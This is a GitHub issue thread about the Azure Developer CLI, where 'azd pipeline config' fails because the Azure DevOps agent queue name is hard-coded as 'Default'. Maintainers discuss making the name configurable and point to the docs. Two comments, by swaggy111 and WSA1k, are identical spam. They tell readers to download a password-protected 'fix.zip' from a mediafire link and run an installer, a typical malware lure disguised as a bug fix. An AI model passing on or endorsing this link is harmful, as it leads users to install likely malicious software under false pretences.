### ISSUE TITLE
[Issue]azd pipeline config could not find a default agent queue in project

### ISSUE THREAD

**Issue by scrocquesel-ml150** [Azure/azure-dev#4248]
- [x] Make sure you've installed the latest version using [instructions in the wiki](../wiki/install)

**Output from `azd version`**
azd version 1.9.5 (commit cd2b7af9995d358aab33c782614f801ac1997dde)

**Describe the bug**
Running `azd pipeline config --provider azdo` fails with 

```
ERROR: could not find a default agent queue in project xxx
```

The name of the agent queue is hard coded

https://github.com/Azure/azure-dev/blob/a17935e47211ed01780281974c6d63b467de5b14/cli/azd/pkg/azdo/pipeline.go#L48

**To Reproduce**
N/A

**Expected behavior**
We are able to give the name of the queue to use and the config passes.

**Environment**
N/A

**Additional context**
My agent queue is named `Azure Pipelines`

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rajeshkamal5050** [comment]
@vhvb1989 can we make agent/pool name `Default` configurable?

**Comment by vhvb1989** [comment]
Yes, I will take a look. We should be able to check if more than one and list them to ask user to pick which to use

**Comment by rajeshkamal5050** [comment]
@vhvb1989 can't we infer this from being defined in the azdo pipeline yaml? - https://learn.microsoft.com/en-us/azure/devops/pipelines/yaml-schema/pool?view=azure-pipelines#pool-string

**Comment by vhvb1989** [comment]
> @vhvb1989 can't we infer this from being defined in the azdo pipeline yaml? - https://learn.microsoft.com/en-us/azure/devops/pipelines/yaml-schema/pool?view=azure-pipelines#pool-string

We could, but sometimes projects won't have a pipeline definition, or they could have one which only defines a pool and vmImage (i.e. Ubuntu).  So trying to get the pool name from the definition will not work for all scenarios.

The agent pool name can be defined in the pipeline definition to override the default agent pool used and assigned to the pipeline when the pipeline was created...

**Comment by rajeshkamal5050** [comment]
@vhvb1989 moving this to next iteration.

**Comment by DanAIDev** [comment]
Is there any progress or possible workarounds for this problem? It is a blocker for me currently

**Comment by puicchan** [comment]
@vhvb1989 - you mentioned "The agent pool name can be defined in the pipeline definition to override the default agent pool used and assigned to the pipeline when the pipeline was created..." I see the documentation here - https://learn.microsoft.com/en-us/azure/developer/azure-developer-cli/pipeline-create-definition?tabs=azdo. Can we close this?
